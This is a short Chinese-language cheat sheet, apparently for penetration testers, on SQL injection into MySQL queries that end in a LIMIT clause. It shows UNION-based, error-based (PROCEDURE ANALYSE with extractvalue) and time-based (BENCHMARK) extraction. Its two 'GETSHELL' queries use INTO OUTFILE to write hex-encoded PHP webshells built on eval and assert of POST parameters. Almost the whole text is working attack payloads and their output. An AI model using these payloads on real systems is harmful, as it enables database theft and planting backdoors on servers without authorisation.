1)无order by
可以使用union select,例如:

mysql> SELECT 1 from mysql.user limit 0,1 union select 234;
+-----+
| 1 |
+-----+
| 1 |
| 234 |
+-----+
2 rows in set (0.00 sec)

GETSHELL:

mysql> SELECT 1 from mysql.user limit 0,1 union select 0x3c3f706870206576616c28245f504f53545b277a275d293b3f3e from mysql.user into outfile '/tmp/z.php';
Query OK, 2 rows affected (0.00 sec)

2)有order by
UNION语句不能在ORDER BY的后面,如下所示:

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 union select 234;
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY

我们可以使用PROCEDURE ANALYSE,通过分析select查询结果对现有的表的每一列给出优化的建议。

支持报错

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); 
ERROR 1105 (HY000): XPATH syntax error: ':5.1.73-log'

不支持报错,用time-based

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(50000000,SHA1(1)),1))))),1);
ERROR 1105 (HY000): XPATH syntax error: ':0'

注意这里不能用sleep而只能用benchmark。

GETSHELL:

mysql> SELECT 1 from mysql.user order by 1 limit 0,1 into outfile '/tmp/2.php' LINES TERMINATED BY 0x3C3F7068702061737365727428245F504F53545B70765D293B3F3E;
Query OK, 1 row affected (0.00 sec)